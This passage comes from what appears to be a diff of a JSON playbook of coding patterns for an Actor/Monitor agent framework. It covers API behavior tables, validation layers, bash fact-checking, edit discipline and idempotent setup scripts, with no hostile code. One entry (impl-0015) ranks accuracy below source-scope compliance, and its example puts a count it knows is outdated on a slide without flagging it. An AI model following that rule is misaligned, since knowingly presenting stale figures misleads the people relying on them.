This format provides business stakeholder visibility (non-technical readable) while serving as specification for technical implementation. Rows = system states (e.g., 'No plan exists', 'Incomplete plan exists'), Columns = operations (GET, POST, DELETE), Cells = outcomes (status codes, state transitions). Include separate column for 'Expected Behavior' when investigating bugs (highlights discrepancies). Pattern scales: 3 states × 4 operations = 12 cell matrix vs 12 separate text descriptions. Use tables in PRs, API docs, and requirements specifications.", - "code_example": "```markdown\n\nWhen no plan exists, GET returns 404 and POST creates new plan. When incomplete plan exists, GET returns the plan and POST replaces it. When complete plan exists, GET returns it and POST returns 409 conflict.\n\n\n## Plan API Behavior Matrix\n\n| System State | GET /plans/{user_id} | POST /plans/{user_id} | DELETE /plans/{user_id} | Expected Behavior |\n|--------------|----------------------|------------------------|-------------------------|-------------------|\n| No plan exists | 404 Not Found | 201 Created (new plan) | 404 Not Found | ✅ Correct |\n| Incomplete plan exists | 200 OK (incomplete plan) | 201 Created (replaces old) | 204 No Content | ✅ Correct |\n| Complete plan exists | 200 OK (complete plan) | 409 Conflict | 204 No Content | ⚠️ BUG: POST should return 409, returns 201 |\n| Multiple plans exist (invalid) | 500 Internal Error | 500 Internal Error | 500 Internal Error | ⚠️ BUG: Should prevent this state |\n\n**Notes:**\n- Incomplete plan: `complete` field = `false`\n- Complete plan: `complete` field = `true` \n- Multiple plans state should be prevented by unique constraint (bug #1235)\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "impl-0001", - "qual-0001" - ], - "tags": [ - "documentation", - "behavior-matrix", - "api", - "specification", - 
"markdown", - "table", - "stakeholder", - "testing" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0007", - "content": "Ambiguity Resolution Documentation: When technical terms have multiple meanings in your domain (e.g., 'plan' = data structure vs 'plan' = user's travel itinerary), explicitly document all definitions at the start of specifications. Use glossary format: Term → Definition + Context. This prevents miscommunication between business stakeholders (domain meaning) and engineers (technical meaning). Pattern proven: without glossary, 'plan is incomplete' has 2 interpretations (missing data fields vs user hasn't finalized travel). Include glossary in API docs, requirements, and exploratory test reports. Update glossary when discovering new ambiguous terms during investigation.", - "code_example": "```markdown\n\n## Plan API Testing Results\nThe plan endpoint has issues when plan is incomplete.\n\n\n\n## Glossary\n\n**Plan (data structure)**: JSON object in database with fields `user_id`, `destination`, `dates`, `complete` (boolean). Technical representation.\n\n**Plan (user intent)**: User's travel itinerary from business perspective. Considered \"incomplete\" if user hasn't finalized decisions (complete=false), \"complete\" if ready to book (complete=true).\n\n**Incomplete plan**: Ambiguous term. 
In this document:\n- **Technical meaning**: Plan object where `complete` field = `false`\n- **Business meaning**: User hasn't finished planning their trip\n- **They align**: Technical flag tracks business state\n\n## Testing Results\nThe plan endpoint (POST /plans/{user_id}) has unexpected behavior when an incomplete plan (complete=false) already exists...\n\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T13:45:00.000000Z", - "last_used_at": "2025-10-20T13:45:00.000000Z", - "related_bullets": [ - "qual-0001", - "impl-0001" - ], - "tags": [ - "documentation", - "glossary", - "ambiguity", - "terminology", - "communication", - "api", - "specification", - "domain-language" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0008", - "content": "Multi-Layered Defensive Programming: Implement validation at multiple defensive layers to prevent invalid states and provide actionable error messages. Layer 1: Input validation (check parameters before processing). Layer 2: State validation (verify preconditions like 'plan exists' before accessing properties). Layer 3: Clear error messages (include recovery instructions, not just failure description). Pattern proven: adding null check before plan.subtasks prevents AttributeError crash, replacing with ValueError('No active plan exists. Create plan first...') guides users to resolution. Each layer serves different purpose: input catches malformed data, state catches workflow violations, messages enable self-service recovery. 
Apply to APIs, CLIs, and internal functions.", - "code_example": "```python\n# ❌ POOR - single layer, crashes with cryptic error\ndef update_subtask(self, subtask_id: int, status: str):\n plan = self._load_plan() # May return None\n for subtask in plan.subtasks: # ❌ AttributeError: 'NoneType' object has no attribute 'subtasks'\n if subtask.id == subtask_id:\n subtask.status = status\n\n# ✅ GOOD - multi-layered defensive programming\ndef update_subtask(self, subtask_id: int, status: str, error: Optional[str] = None):\n # Layer 1: Input validation\n if not isinstance(subtask_id, int) or subtask_id < 1:\n raise ValueError(f\"Invalid subtask_id: {subtask_id}. Must be positive integer.\")\n if status not in ['pending', 'in_progress', 'completed', 'failed']:\n raise ValueError(f\"Invalid status: {status}. Must be one of: pending, in_progress, completed, failed.\")\n \n # Layer 2: State validation\n plan = self._load_plan()\n if plan is None:\n raise ValueError(\n \"No active plan exists. Create a plan first using: \"\n \"'python -m mapify_cli.recitation_manager create '\"\n )\n \n # Layer 3: Business logic with clear error messages\n for subtask in plan.subtasks:\n if subtask.id == subtask_id:\n subtask.status = status\n if error:\n subtask.error = error\n return\n \n raise ValueError(\n f\"Subtask {subtask_id} not found in plan. 
\"\n f\"Valid subtask IDs: {[s.id for s in plan.subtasks]}\"\n )\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T14:45:00.000000Z", - "last_used_at": "2025-10-20T14:45:00.000000Z", - "related_bullets": [ - "arch-0003", - "test-0008" - ], - "tags": [ - "defensive-programming", - "validation", - "error-handling", - "python", - "api", - "cli", - "user-experience" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0009", - "content": "Fact Extraction Bash Verification Protocol: When agents extract facts from documentation about codebases (README, wikis, specs), ALWAYS verify EVERY claim using bash commands before recording to memory or playbook. Documentation can be outdated, but codebase is ground truth. Required verifications: (1) File existence claims: ls, find, test -f. (2) Directory structure claims: tree, ls -R. (3) Code pattern claims: grep, rg with pattern. (4) Quantity claims: wc -l, find | wc. Template must encode verification as MANDATORY step, not optional suggestion. 
Pattern prevents documentation rot where extracted 'facts' diverge from reality.", - "code_example": "```bash\n# ❌ INCORRECT - extract from docs without verification\necho \"Project has 15 agent templates\" >> facts.txt\n# Risk: Documentation may be stale\n\n# ✅ CORRECT - verify every claim with bash\n# Claim: \"Project has agent templates in src/templates/\"\ntest -d src/templates && echo \"✅ Directory exists\" || echo \"❌ FAILED\"\nls src/templates/*.md | wc -l # Actual count: 12 (not 15!)\n\n# Claim: \"All templates use YAML frontmatter\"\ngrep -L '^---' src/templates/*.md # Find templates WITHOUT frontmatter\n# Result: 3 templates lack frontmatter (claim FALSE)\n\n# ONLY record verified facts:\necho \"Project has $(ls src/templates/*.md | wc -l) agent templates\" >> facts.txt\necho \"9/12 templates use YAML frontmatter (3 missing)\" >> facts.txt\n```", - "helpful_count": 4, - "harmful_count": 0, - "created_at": "2025-10-20T23:37:01.153726Z", - "last_used_at": "2025-10-21T15:36:06.017156Z", - "related_bullets": [ - "impl-0005", - "test-0004" - ], - "tags": [ - "verification", - "bash", - "fact-extraction", - "documentation", - "ground-truth", - "map-framework", - "agent", - "template" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0010", - "content": "Incremental Fix Application vs Content Regeneration: When applying fixes to existing files, ALWAYS use Edit tool for targeted changes. NEVER use Write tool to regenerate entire file content. Edit tool preserves git history granularity (shows what changed), prevents unintended modifications to unrelated code, and reduces token usage. Write tool appropriate ONLY for new file creation, not modifications. Pattern proven: Edit tool for single-line fixes maintains clean git diffs, Write tool regeneration creates noisy diffs showing entire file as changed. 
This principle applies to all file modifications regardless of file size.", - "code_example": "```python\n# ❌ INCORRECT - regenerate entire file with Write\nfile_content = read_file('config.py')\nfixed_content = file_content.replace('old_value', 'new_value')\nwrite_file('config.py', fixed_content) \n# Git diff: shows ENTIRE file as changed (noisy)\n\n# ✅ CORRECT - targeted edit with Edit tool\nedit_file(\n file_path='config.py',\n old_string='old_value',\n new_string='new_value'\n)\n# Git diff: shows only changed line (clean)\n\n# Pattern applies even for multi-line fixes:\nedit_file(\n file_path='orchestrator.py',\n old_string='''def execute_subtask(self, task):\n result = actor.execute(task)\n return result''',\n new_string='''def execute_subtask(self, task):\n logger.info(f'Executing {task.id}')\n result = actor.execute(task)\n logger.info(f'Completed {task.id}')\n return result'''\n)\n# Preserves surrounding context, clean diff\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-20T23:37:01.153734Z", - "last_used_at": "2025-10-20T23:37:01.153735Z", - "related_bullets": [ - "impl-0003", - "impl-0005" - ], - "tags": [ - "edit-tool", - "write-tool", - "incremental", - "git-diff", - "file-modification", - "python", - "map-framework", - "code-quality" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0011", - "content": "Reference-Before-Implementation Pattern: When creating new artifacts that extend existing series (e.g., verified_facts_workflow.txt extending verified_facts_core.txt), ALWAYS extract format patterns from existing artifacts FIRST before implementation. Use grep to identify structural elements (heading formats, bullet prefixes, delimiter patterns) and replicate exactly. This prevents format inconsistency causing Monitor rejections due to style mismatches. Pattern: grep '## ' to extract heading style, grep '\\*\\*Fact:\\*\\*' to extract fact prefix format. 
Single upfront extraction (5 minutes) prevents multiple Monitor rejection cycles (hours).", - "code_example": "```bash\n# ❌ INCORRECT - implement new artifact without checking existing format\necho \"# New Verified Facts\\nFact: Pattern A exists\" > new_file.txt\n# Risk: Format mismatch → Monitor rejection\n\n# ✅ CORRECT - extract format from existing artifact first\n# Step 1: Identify structural elements\ngrep '^## ' existing_verified_facts.txt # Heading format: '## Section Name'\ngrep '\\*\\*Fact:' existing_verified_facts.txt # Fact prefix: '**Fact:**'\ngrep '^###' existing_verified_facts.txt # Subsection format: '### Subsection'\n\n# Step 2: Document format patterns\necho \"Format rules:\n- Headings: ## for sections, ### for subsections\n- Facts: **Fact:** prefix, numbered facts NOT used\n- Delimiters: blank line between facts\"\n\n# Step 3: Implement new artifact following extracted format\ncat > new_verified_facts.txt << 'EOF'\n## New Section Name\n\n**Fact:** Pattern A exists in src/templates/\n\n**Fact:** Pattern B uses YAML frontmatter\nEOF\n\n# Verification: compare format consistency\ndiff <(head -5 existing_verified_facts.txt) <(head -5 new_verified_facts.txt)\n```", - "tags": [ - "format-extraction", - "consistency", - "grep", - "bash", - "documentation", - "monitor", - "map-framework", - "artifact-creation" - ], - "helpful_count": 2, - "harmful_count": 0, - "created_at": "2025-10-21T10:08:01.014406Z", - "related_bullets": [ - "impl-0009", - "test-0004" - ], - "last_used_at": "2025-10-21T14:46:01.752274Z" - }, - { - "id": "impl-0012", - "content": "Verification Completeness After Fixes: When fixing issues reported by validation agents, ALWAYS verify that ALL instances are fixed, not just the first few. Use quantitative verification (count before/after) and exhaustive search (grep, find) to ensure completeness. 
Example: if Monitor reports '4 duplicate pairs', after removal verify with 'grep -c duplicate' or count operation that 0 remain, not just that 2 specific IDs were removed. Incomplete fixes cause repeated iterations for the same issue category. Pattern proven: quantitative verification (55 facts counted with grep -c) prevents claiming incorrect numbers (56) in deliverables.", - "code_example": "```bash\n# ❌ INCORRECT - fix first few instances, assume done\ngrep 'duplicate_id_001' facts.txt # Found, remove it\ngrep 'duplicate_id_002' facts.txt # Found, remove it\n# Assumption: fixed all duplicates (WRONG - 2 more remain)\n\n# ✅ CORRECT - quantitative verification of complete fix\n# Before fix: count duplicates\nbefore_count=$(grep -c 'duplicate_pattern' facts.txt)\necho \"Before: $before_count duplicates found\"\n\n# Apply fix to ALL instances\nsed -i '/duplicate_pattern/d' facts.txt\n\n# After fix: verify 0 remain\nafter_count=$(grep -c 'duplicate_pattern' facts.txt)\necho \"After: $after_count duplicates remain\"\n\nif [ \"$after_count\" -ne 0 ]; then\n echo \"❌ INCOMPLETE FIX: $after_count duplicates still present\"\n exit 1\nfi\n\necho \"✅ COMPLETE FIX: all duplicates removed (verified)\"\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T09:04:13.348159Z", - "last_used_at": "2025-10-21T09:04:13.348163Z", - "related_bullets": [ - "impl-0009", - "test-0009" - ], - "tags": [ - "verification", - "completeness", - "quantitative", - "bash", - "grep", - "validation", - "fix-verification", - "exhaustive-search", - "map-framework" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0013", - "content": "Source Material Boundary Validation: When tasks specify source material constraints (e.g., 'Use ONLY verified_facts.txt', 'Implement using library X'), treat these as SCOPE constraints (must use specific sources) not QUALITY constraints (any accurate source). 
Before implementation: 1) Parse constraint type explicitly, 2) Create allowed/forbidden source lists, 3) Read allowed sources to build working set, 4) Implement ONLY from working set, 5) Validate each fact/component's provenance. Default to strictest interpretation when ambiguous - if unsure whether 'verified facts' means quality or scope, treat as scope (specific file boundary). This prevents using correct-looking but out-of-scope material.", - "code_example": "```markdown\n# Task: Create docs using ONLY verified_facts.txt\n\n# ❌ INCORRECT - Quality constraint interpretation\n\"I'll use accurate metrics from CHANGELOG.md since they're verified\"\n→ Uses out-of-scope CHANGELOG.md\n\n# ✅ CORRECT - Scope constraint interpretation\n## Step 1: Parse constraint type\n\"ONLY verified_facts.txt\" → Scope constraint (specific file)\n\n## Step 2: Create source boundary\nAllowed: [verified_facts.txt]\nForbidden: [CHANGELOG.md, docs/, memory]\n\n## Step 3: Build working set\nRead verified_facts.txt → Extract all facts → Working set\n\n## Step 4: Validate provenance\nFor each claim:\n Source file = ?\n In allowed list? YES → USE, NO → REJECT\n```", - "helpful_count": 3, - "harmful_count": 0, - "created_at": "2025-10-21T09:45:10.125668Z", - "last_used_at": "2025-10-21T15:36:06.017184Z", - "related_bullets": [ - "impl-0011", - "impl-0009" - ], - "tags": [ - "source-validation", - "scope-constraint", - "boundary-validation", - "content-generation", - "provenance", - "markdown", - "documentation" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0014", - "content": "Constraint Type Classification: Before implementing content generation or configuration tasks, explicitly classify each requirement as Quality constraint (satisfied by any compliant approach) vs Scope constraint (satisfied only by specific allowed components/sources). Quality: 'code must be readable', 'facts must be accurate'. Scope: 'use library X', 'source from file Y'. 
When encountering ambiguous phrasing like 'verified facts' (could mean quality 'facts that are verified' or scope 'facts from verified_facts.txt'), default to scope interpretation (stricter boundary). Document classification in implementation notes: 'Requirement X classified as scope constraint - allowed sources: [A, B], forbidden: [C, D]'.", - "code_example": "```python\n# Requirement: \"Use ONLY verified database connections\"\n\n# ❌ INCORRECT - Assumes quality constraint\nconn = create_any_valid_connection() # Any working connection\n\n# ✅ CORRECT - Classifies as scope constraint\n# Step 1: Parse constraint\n# \"ONLY verified database connections\" → Scope or Quality?\n# Has \"ONLY\" keyword → Likely scope (exclusive boundary)\n\n# Step 2: Document classification\n# Constraint type: SCOPE\n# Allowed sources: verified_connections.yaml\n\n# Step 3: Implement with boundary validation\nimport yaml\nwith open('verified_connections.yaml') as f:\n allowed_conns = yaml.safe_load(f)\nif connection_name in allowed_conns:\n conn = create_connection(allowed_conns[connection_name])\nelse:\n raise ValueError(f\"{connection_name} not in verified sources\")\n```", - "helpful_count": 2, - "harmful_count": 0, - "created_at": "2025-10-21T09:45:10.125685Z", - "last_used_at": "2025-10-21T15:36:06.017190Z", - "related_bullets": [ - "impl-0011" - ], - "tags": [ - "constraint-classification", - "scope-vs-quality", - "requirement-parsing", - "boundary-validation", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0015", - "content": "SCOPE Compliance Priority Rule: When SCOPE constraints limit documentation completeness (relevant accurate content exists in forbidden sources), ALWAYS prioritize Compliance > Completeness > Accuracy hierarchy. Accept reduced scope documentation rather than violating source boundaries. SCOPE constraint 'Use ONLY file X' means exclusive boundary - content from file Y is invalid even if factually superior. 
If completeness is critical to task success, explicitly request scope expansion ('Can I also use file Y?') BEFORE implementation. Never self-authorize scope expansion to 'improve quality'. Pattern prevents Monitor rejection loops where Actor uses correct-but-forbidden sources.", - "code_example": "```python\n# Task: Create presentation using ONLY verified_facts.txt\n# Challenge: verified_facts.txt has 12 agent templates, but codebase has 13\n\n# ❌ INCORRECT - Prioritize completeness/accuracy over compliance\ndef create_presentation():\n # \"verified_facts.txt is outdated, I'll check actual code for accuracy\"\n actual_count = len(glob('src/templates/agents/*.md')) # 13\n slide_content = f\"System has {actual_count} agent templates\" # SCOPE VIOLATION\n # Rationale: \"More accurate\"\n # Problem: Violates 'ONLY verified_facts.txt' constraint\n\n# ✅ CORRECT - Prioritize compliance over completeness\ndef create_presentation_scope_aware():\n # Step 1: Read designated source ONLY\n facts = read_file('verified_facts.txt')\n template_count = extract_fact(facts, 'agent templates') # \"12 templates\"\n \n # Step 2: Accept reduced scope\n slide_content = f\"System has {template_count} agent templates\" # From source\n # Known limitation: Source may be outdated (actual: 13)\n # Decision: Compliance > Accuracy for SCOPE constraints\n \n # Step 3: Request scope expansion if completeness critical\n if task_requires_completeness:\n raise ScopeExpansionRequest(\n \"verified_facts.txt shows 12 templates but codebase has 13. \"\n \"Can I verify against codebase to ensure completeness?\"\n )\n \n return slide_content\n\n# Priority Hierarchy for SCOPE Constraints:\n# 1. Compliance (use only allowed sources) ← HIGHEST\n# 2. Completeness (include all relevant info) ← MEDIUM \n# 3. 
Accuracy (match ground truth) ← LOWEST\n# If conflict, sacrifice lower priority to preserve higher\n```", - "related_bullets": [ - "impl-0014", - "test-0010", - "impl-0013" - ], - "tags": [ - "scope-constraints", - "compliance", - "validation", - "map-framework", - "monitor", - "constraints" - ], - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-21T14:46:01.752285Z", - "last_used_at": "2025-10-21T15:36:06.017192Z", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0016", - "content": "Procedural Pattern Enforcement: Transform constraint-type patterns (SCOPE, SECURITY, VALIDATION) from declarative guidance ('follow SCOPE rules') to executable procedures with numbered pre-flight checklists, copy-pasteable verification commands, and economic incentives (violation detection cheaper than violation fixing). Gap between pattern awareness (knowledge-retrieval mode) and pattern execution (execution-discipline mode) causes violations even when pattern is in context. Procedural enforcement bridges gap: Actor claims to 'apply impl-0015' but violates SCOPE (iteration 1) → Checklist with verification commands forces execution (iteration 2 succeeds). 
Apply to patterns with compliance requirements, not creative/judgment tasks.", - "code_example": "```python\n# ❌ DECLARATIVE PATTERN - Awareness only, execution optional\npattern_impl_0015 = {\n \"title\": \"SCOPE Compliance Priority Rule\",\n \"content\": \"When SCOPE constraints exist, prioritize Compliance > Completeness > Accuracy.\",\n \"guidance\": \"Follow the hierarchy when making decisions.\"\n}\n# Result: Actor 'understands' pattern but violates SCOPE in practice\n\n# ✅ PROCEDURAL PATTERN - Executable enforcement\npattern_impl_0015_procedural = {\n \"title\": \"SCOPE Compliance Priority Rule\",\n \n # Pre-flight checklist (MANDATORY)\n \"checklist\": [\n \"[ ] Step 1: Identify SCOPE constraint keywords ('ONLY', 'MUST use', 'from file X')\",\n \"[ ] Step 2: Extract allowed sources list (e.g., ['verified_facts.txt'])\",\n \"[ ] Step 3: Extract forbidden sources list (e.g., ['CHANGELOG.md', 'memory', 'code'])\",\n \"[ ] Step 4: Read ONLY allowed sources, build working set\",\n \"[ ] Step 5: For each fact/component, validate: source in allowed_list?\",\n \"[ ] Step 6: BEFORE finalizing, run verification command below\"\n ],\n \n # Copy-pasteable verification command\n \"verification\": '''\n# Verify no forbidden sources used\ngrep -i 'CHANGELOG\\|memory\\|actual count' output.txt && echo \"❌ SCOPE VIOLATION\" || echo \"✅ COMPLIANT\"\n''',\n \n # Economic incentive (detection << fixing)\n \"cost_analysis\": {\n \"violation_detection\": \"5 seconds (grep command)\",\n \"violation_fixing\": \"15 minutes (Monitor rejection → rework iteration)\",\n \"roi\": \"180x time savings by running verification upfront\"\n },\n \n # Guidance (declarative part still present but secondary)\n \"principle\": \"Compliance > Completeness > Accuracy hierarchy\"\n}\n\n# Pattern application enforcement:\n# 1. Checklist creates explicit steps (can't skip accidentally)\n# 2. Verification command provides instant feedback (cheap detection)\n# 3. 
Economic incentive creates rational motivation (5s prevents 15min rework)\n# Result: Execution discipline, not just awareness\n```", - "related_bullets": [ - "impl-0015", - "impl-0014", - "impl-0013", - "test-0010" - ], - "tags": [ - "meta-pattern", - "procedural-enforcement", - "checklist", - "verification", - "execution-discipline", - "constraint-compliance", - "scope", - "map-framework", - "pattern-design", - "python" - ], - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-21T15:36:06.017196Z", - "last_used_at": "2025-10-21T15:36:06.017197Z", - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0017", - "content": "Phased Migration Temporary State Documentation: When breaking large documentation updates into subtasks (phased migration), explicitly acknowledge temporary inconsistencies in trade_offs field. Document WHAT sections remain inconsistent (with specific line numbers/section names), WHEN they will be resolved (which subtask number), and WHY the temporary state is acceptable (enables independent validation, manages risk of large atomic changes). This transforms potential validation failures into transparent technical debt management visible to all agents.", - "code_example": "```json\n// ❌ BAD - Silent inconsistency causes validation failures\n{\n \"subtask_id\": \"2.1\",\n \"description\": \"Update Section 3 to remove deprecated patterns\",\n \"trade_offs\": \"Using phased approach for safety\"\n}\n\n// ✅ GOOD - Explicit temporary state documentation\n{\n \"subtask_id\": \"2.1\",\n \"description\": \"Update Section 3 to remove deprecated patterns\",\n \"trade_offs\": \"TEMPORARY INCONSISTENCY: Section 2 references (lines 145-167) still point to old Section 5 content being removed in this subtask. RESOLVES IN: Subtask 2.2 will update Section 2 cross-references. 
WHY ACCEPTABLE: Allows independent validation of Section 3 removal before cascading updates, reduces risk of large atomic change breaking multiple sections simultaneously.\"\n}\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-23T12:06:20.145325Z", - "last_used_at": "2025-10-23T12:21:40.807524Z", - "related_bullets": [ - "impl-0001", - "impl-0006" - ], - "tags": [ - "phased-migration", - "documentation", - "validation", - "technical-debt", - "trade-offs" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0018", - "content": "Actor Tool Invocation Verification with Git Diff: Actors sometimes describe file changes without invoking Edit/Write tools, claiming completion without executing modifications. Monitor MUST verify actual file state using git diff to detect claimed-but-not-executed changes. Pattern: Actor claims 'Added [1.0.0] section to CHANGELOG.md' → Monitor runs 'git diff CHANGELOG.md' → No changes shown → Reject with 'CRITICAL: Changes NOT applied, git diff shows no modifications'. Git diff validation catches both missing tool invocations AND incorrect tool choices (Write instead of Edit). 
This enforces tool invocation discipline - descriptions are not substitutes for actual Edit/Write/Bash execution.", - "code_example": "```python\n# ❌ ACTOR ANTI-PATTERN - claiming without executing\n# Actor output: \"I added [1.0.0] section to CHANGELOG.md\"\n# (No Edit tool call in Actor's actions, OR used Write claiming 'creation')\n\n# ✅ MONITOR VALIDATION - git diff verification\nimport subprocess\n\ndef validate_actor_file_changes(actor_output, file_path, expected_change_description):\n \"\"\"Verify Actor's claimed file changes using git diff.\n\n Returns:\n dict: {\"valid\": bool, \"reason\": str, \"diff_output\": str}\n \"\"\"\n # Run git diff to check actual changes\n result = subprocess.run(\n ['git', 'diff', file_path],\n capture_output=True,\n text=True\n )\n diff_output = result.stdout\n\n if not diff_output.strip():\n return {\n \"valid\": False,\n \"reason\": f\"CRITICAL: Changes NOT applied. Actor claimed '{expected_change_description}' but git diff {file_path} shows no modifications. 
Actor likely described changes without invoking Edit/Write tool, OR used wrong tool (Write for existing file).\",\n \"diff_output\": \"(empty - no changes detected)\"\n }\n\n # Optionally verify specific content in diff\n # For CHANGELOG: check if [1.0.0] appears in added lines\n added_lines = [line for line in diff_output.split('\\n') if line.startswith('+')]\n\n return {\n \"valid\": True,\n \"reason\": f\"Changes verified: git diff shows {len(added_lines)} added lines\",\n \"diff_output\": diff_output\n }\n\n# Usage in Monitor:\nvalidation = validate_actor_file_changes(\n actor_output,\n file_path=\"CHANGELOG.md\",\n expected_change_description=\"Added [1.0.0] initial release section\"\n)\n\nif not validation[\"valid\"]:\n raise MonitorRejection(validation[\"reason\"])\n```", - "helpful_count": 1, - "harmful_count": 0, - "created_at": "2025-10-23T09:20:52.064779+00:00", - "last_used_at": "2025-10-25T21:15:57.637624+00:00", - "related_bullets": [ - "impl-0001", - "impl-0003" - ], - "tags": [ - "map-framework", - "actor", - "monitor", - "validation", - "tool-invocation" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0019", - "content": "Idempotent Documentation Scripts: All user-facing scripts in documentation that modify environment configuration (PATH, shell configs, Windows registry) MUST include idempotency checks before making changes. Users frequently re-run documentation commands during troubleshooting. Check if change already applied (e.g., PATH already contains target directory, registry key exists with correct value) and skip modification if present. Always use conditional logic: 'if not already configured, then configure'. This prevents duplicate PATH entries, redundant registry keys, and broken shell configurations from repeated execution. 
Critical for onboarding docs where users may restart installation multiple times.", - "code_example": "```powershell\n# ❌ NOT IDEMPOTENT - adds duplicate PATH entries\n$newPath = \"C:\\\\Program Files\\\\MyApp\\\\bin\"\n[Environment]::SetEnvironmentVariable(\n \"PATH\",\n $env:PATH + \";\" + $newPath,\n [EnvironmentVariableTarget]::User\n)\n\n# ✅ IDEMPOTENT - checks before modifying\n$newPath = \"C:\\\\Program Files\\\\MyApp\\\\bin\"\n$currentPath = [Environment]::GetEnvironmentVariable(\"PATH\", [EnvironmentVariableTarget]::User)\n\nif ($currentPath -notlike \"*$newPath*\") {\n Write-Host \"Adding $newPath to PATH...\"\n [Environment]::SetEnvironmentVariable(\n \"PATH\",\n $currentPath + \";\" + $newPath,\n [EnvironmentVariableTarget]::User\n )\n} else {\n Write-Host \"$newPath already in PATH, skipping\"\n}\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-23T15:34:43.387364Z", - "last_used_at": "2025-10-23T15:34:43.387371Z", - "related_bullets": [ - "doc-0001", - "doc-0002" - ], - "tags": [ - "idempotency", - "documentation", - "installation", - "powershell", - "environment", - "path", - "user-experience" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0046", - "content": "UV tool CLI isolation: Install Python CLI tools via UV tool entry points (pyproject.toml [project.scripts]) rather than direct module imports. Prevents ModuleNotFoundError when using 'uv tool install'.", - "code_example": "", - "helpful_count": 8, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892087Z", - "last_used_at": "2025-10-24T13:29:43.892094Z", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0047", - "content": "Lazy imports in CLI commands: Use function-level imports to reduce startup time. 
Pattern: 'def main(): from package import module; module.run()'.", - "code_example": "", - "helpful_count": 7, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892102Z", - "last_used_at": "2025-10-24T13:29:43.892103Z", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0048", - "content": "Backward compatibility during CLI migration: Maintain old import paths as shims with deprecation warnings. Document migration in CHANGELOG.", - "code_example": "", - "helpful_count": 8, - "harmful_count": 0, - "created_at": "2025-10-24T13:29:43.892105Z", - "last_used_at": "2025-10-24T13:29:43.892105Z", - "related_bullets": [], - "tags": [ - "uv", - "cli", - "python" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0024", - "content": "Tiered Refactoring with Validation Checkpoints: When structural refactoring affects 10+ files, organize changes into priority-based tiers and validate after each tier before proceeding. Tier 1 (Critical): Core functionality, production code with zero tolerance for breakage. Tier 2 (Internal): Development tools, internal scripts, test infrastructure. Tier 3 (Archive): Historical documentation, deprecated examples. Execute Tier 1 → validate (run tests, verify imports) → Tier 2 → validate → Tier 3. If any tier fails validation, stop and fix before proceeding. This containment strategy limits blast radius - Tier 1 failure caught early prevents cascading to 50+ files. Commit each tier separately for granular rollback capability.", - "code_example": "```bash\n# ❌ RISKY - Atomic refactoring of 50 files\n# Update all 50 files at once\nfor file in $(find . 
-name '*.py'); do\n sed -i 's/old_import/new_import/g' $file\ndone\ngit commit -am \"Refactor all imports\"\n# Result: If 1 file breaks, entire commit must be reverted\n\n# ✅ SAFE - Tiered execution with checkpoints\n# Tier 1: Critical production code (5 files)\ngit mv src/old_module/ src/new_module/\nsed -i 's/old_module/new_module/g' src/main.py src/api.py src/core.py\ngit commit -m \"Tier 1: Refactor core module imports\"\npytest tests/critical/ # CHECKPOINT - must pass\n\n# Tier 2: Internal tools (15 files) \nsed -i 's/old_module/new_module/g' scripts/*.py tools/*.py\ngit commit -m \"Tier 2: Update internal tool imports\"\npytest tests/ # CHECKPOINT - must pass\n\n# Tier 3: Documentation and examples (30 files)\nfind docs/ examples/ -name '*.md' -exec sed -i 's/old_module/new_module/g' {} +\ngit commit -m \"Tier 3: Update documentation references\"\n# Validation: grep to verify no old references remain\nrg 'old_module' --type py --type md || echo \"All updated\"\n```", - "helpful_count": 0, - "harmful_count": 0, - "created_at": "2025-10-25T13:32:16.485305Z", - "last_used_at": "2025-10-25T13:32:16.485306Z", - "related_bullets": [ - "doc-0008", - "arch-0002", - "tool-0013" - ], - "tags": [ - "refactoring", - "tiered-execution", - "validation", - "checkpoints", - "risk-mitigation", - "testing", - "bash", - "structural-change" - ], - "deprecated": false, - "deprecation_reason": null - }, - { - "id": "impl-0025", - "content": "Deploy-What-You-Test Pattern (workflow_call): Use GitHub Actions workflow_call trigger to reuse CI workflow in release workflow, ensuring the exact artifacts that passed tests are published. CI workflow uploads build artifacts, release workflow downloads them via actions/download-artifact with matching run_id. Prevents drift between tested code and deployed code. 
